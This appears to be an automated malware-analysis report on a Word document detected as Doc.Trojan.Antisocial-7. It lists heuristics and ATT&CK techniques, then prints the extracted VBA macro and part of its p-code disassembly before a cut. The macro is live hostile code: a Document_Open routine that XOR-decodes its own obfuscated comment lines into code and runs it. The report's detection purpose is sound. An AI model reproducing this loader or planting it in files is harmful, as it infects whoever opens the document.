MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when a document is opened. The macro code is obfuscated but appears to deobfuscate and execute further content. The ClamAV heuristic also flags this as a Trojan. The presence of VBA macros and the Document_Open subroutine strongly suggests a malicious document intended to be delivered via spearphishing.
Heuristics (3)
- ClamAV: Doc.Trojan.Antisocial-7 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Antisocial-7
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9795 bytes |

SHA-256: d228c650b29f6e3687ba7312a1522a52ce12d5ab3eba34673b1ccbd5f5e83b77

Detection (ClamAV): Doc.Trojan.Antisocial-7
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
For V1 = 17 To 41
v2 = Null
V3 = (ThisDocument.VBProject.vbCoMpoNenTS.Item(1).coDeMoDuLe.LINEs(V1, 1))
v4 = Asc((Mid(V3, 2, 1)))
v5 = v4 Xor 39
For v6 = 4 To Len(V3) Step 2
V7 = Asc(Mid(V3, v6, 1)) Xor v5
v2 = v2 & Chr(V7)
Next
ThisDocument.VBProject.vbCoMpoNenTS.Item(1).coDeMoDuLe.REplaCElINe V1, v2
Next
Demo
End Sub
Private Function Demo()
' GHfi±'!b“UíUôh]U÷'ÅUkb(tÈRêjëBÎ'Wi£b� ÐSç
' ºA¡h;U˜'SF³'û:v'%6Õ0Í'—S^hµ'Ò3.6È
'/‡j³(J5B(Óf‘}Êdqdj
' Èdz'6:q'N%¹ {%N'¨!ò'‰/És=oUnÍT7C²h×DRéJÛb?I-S=):Q^EµwýU¹hqMÞB±DÂs3)¾qLeTdïhQJŒwfh]ißb$iìsât–)xn²s÷b³J®/V6}.t)ÅDühõCÇBÖj‰hoc¯r3k*bN):kùN2I·bšts/zF“+¤'Ô6Ê.]./
'#2`8$†9Ð$ M|J¨pÑ,ºv:jé`Ñ,‰-Ö$r.è$õ<V-¶$ˆ/'$ó5)
'%½dÄm¯pÙ"©GÄ"7?�"q3W"[VãM|"ÌNÌG0L'*‡A¶+¹
'%,D¾"á?µ"nCXQàaˆ*�o¥K`f„*—Ai.�"`G0.i"Ü3©+È+µ"áZ°MYpð"ªfà
'&ÑH9G¼!þGž!‚=^!g8Æ1X!-@ªoWe"!ÈGO!h?-!17.4î!*u$iPd²oê
'#EMæb–$–MÑJ,pÙ,ÌV¯jû`i$2.é$á5§5º-÷$U:,$ì1Ü$JpµL%a÷JU$Žb…$ý9S$âBn$ƒ/©$ð7ê6ç
'%âg3n–Q½gcKnD²"xDf"É>ð"Ÿ3=0Z0ä"²CwlõFa"Àd6"£<ð";;Ô5Q"ýVjj¿G·lÇ
'#|mãb0$WMIJ4p¿,@V¬J `u$M.t$æ5|54-ü$†:Ã$_1Q$ªpÁL™a®J¸$ŒBØ$À9 $pb<$ô)Ò$´7š6
'#!A[jÌ`ó$ªm7BÃ
'%£@l"ƒ?û"ù@ª"˜$B"sAôj¡p…*¤d]+á"3$u"ÛAäjíP¦*:KÌl‘v0**jPÍl=FÙ"æ(ƒ"•0V00•+¡"�)Z"c1ž1Õ+p+š
'#¦JwaE|êPó$µA0
'!mrONáo4U‚BFIjEðS4kŽCÉHurl(ƒpÜD'VttýiÚl�Cgeêrë(|P€Dqe(iSKôVãiKhˆcTHsR¡Uy(úoâréC0kÄ.£7ê/'(lEÁijbÍCÉk*iõbMs¿jìc(XTßcÈV)J,gýEhc™j2okHNc–&4gm*Ì&ï$k!ð$v&S `&Õdí
'#1J‚a‹|OpÜ$veO
'%óm0r!v|kÃm"lWQñ,™T[k�PûW¿q}RlP®M¸v'gÛaLvxK¥mÓlÁ"Ÿ?2"q2Z
'!ƒilvOrâoÂi=h¢U¡(DUaG’P‘C7HxIXtˆk_GQJ^V$t5IQk®v£Rr&E;ì&}61
'$ïLçS~W›JLëmìPÁ-æ@¦l¬MEeƒJ¡q·n!@Çl*M…U¬F8q*PÜJ´l?mÖP9#´>É#C3=
'%ÝV§F'"Ù?9"´VwJŠKùq?fam aÌw0O¸G=lHv…,lt�@Ðr«P²M;H°gña.v‹,¿t`´A¡MÊoår¼m@LNgUliváq—,0KMV]gyož*ã3£+¿,øaûmsfÙgŽO�m—FeWânµGë,CNÖKhL\gïqÓ*>3–.é")VJJHk�qOfÝmVa2Wîoðg×LŽvG,ót6@är˜pTMöh¤goa–v°,�tX`uA¦M›oËR*môlÖGNL™V¤Qä,rKþvCGYO×*Ÿ3�+ï,òa7m…Fžg o~m3fíWÜNôGÉ,ÆA5mPwöLævÏMõDTn—k‹lvg�qä+µ
'/ÇF#gÜzËE«iüD¸\êm�eµX‰D…Iè|µMi&^^'J;Xqz…gÔb8MkkÅ|ó&5~œJlk…g¸e"XßgbF²M‹F»\r[y&ªA¹|ZmÒE8 {9v!Ž&ük¾gŒL®m0e7GËLà}ÌDžm–&×LÍmCdöM¡\ùM)dyArf™M�{¶(‹9J$>(ÎF‡g5zøE©i.D‡\XmYE[xßdüi·|ém'&z^®JþX·zoGgb%m`kž|p&°~NJwKÔgÁEõXrGoFPm§f|\$[Ê&šA)|SmõES %9¢!!&¬kAg.ltMRe¿GRl\}uDîm�&ðKZgo]µfž|�GŠnüdTaÊFæm&{$
'"dKÔjÖW¯h†dÅIzQÝ`xhñUZi‚D1Q¡`3+ÞSJguKw‹JÑOÇ`çF3Qå+~SÑGâF°jÑHnU•JˆKÂ`¥KúQäv”+¦lfQ`©h¨-å4 ,y+ôfMJ‰A«`çHíjŸAÊPðiR`â+IdqA�a”cpWTJ‡hCvÄq—w7lMkŸBí%ÇqÝA3
'%ÈC›aKV{KXtdgæF{m±amWÙoUGÓL vñ,ÊTA@‡R×PPm®hÒg!a×Vò,VtS`kAÇMÔo$RÁMæLOg2lmVóqô,þKÅVÜGuOÖ*Ô3,+¥,iaŒMXFŠgTO)m’f€w$n¶G™,¦fõgæNtgEV¢GÏn÷kklåGMQå"3t.«"?c¡a”vËKÛTŸGlF£M„aÐwßorG„l‚vû,ùTn@ar–P•m¬hŽg)a+vz,gtê`£A£m¾oXrwmîL¾G¸lhv†q×,ÁkZvMG¥Oµ*23‰+©,¯aãmŽF$gÕoZM–f W;nÙg¬,@A$M!W¸l¸Vém~D�nrK2lsGmq§
'/ðinkœ|*a7~ÔM´lÙG-Kê}MEüM›f‹|œ&Û^wjJX�z4g«B´m˜ky|Y&w~Ðj¼K–góE=X®Gïf‰MõfZ\w[)&>AB|çmÀe¹ }9¶!%&lkCGƒL¼mÛE#G1l0}÷DTmY&DIéLBLFnêZ”G¬eÐ{â|½z´ApF•OT(Î\ÒL†
' ŸF"dPsîN¿Q½BICòH¨DTréJ_B<iiS')»t’F"qSbÄfStZ'hAånIKïb6IÄF�jêB"=D:;FÓDKspnzqob5cìHˆD+R¹JlBLIîsd)¦A¶r!K²K-IÝffj/Be
End Function
' Processing file: /opt/analyzer/scan_staging/44f9906c0eb04548b7f27398ed3f6aa9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 11286 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #2:
' StartForVariable
' Ld V1
' EndForVariable
' LitDI2 0x0011
' LitDI2 0x0029
' For
' Line #3:
' LitVarSpecial (Null)
' St v2
' Line #4:
' Ld V1
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd vbCoMpoNenTS
' ArgsMemLd Item 0x0001
' MemLd coDeMoDuLe
' ArgsMemLd LINEs 0x0002
' Paren
' St V3
' Line #5:
' Ld V3
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' ArgsLd Asc 0x0001
' St v4
' Line #6:
' Ld v4
' LitDI2 0x0027
' Xor
' St v5
' Line #7:
' StartForVariable
' Ld v6
' EndForVari
... (truncated)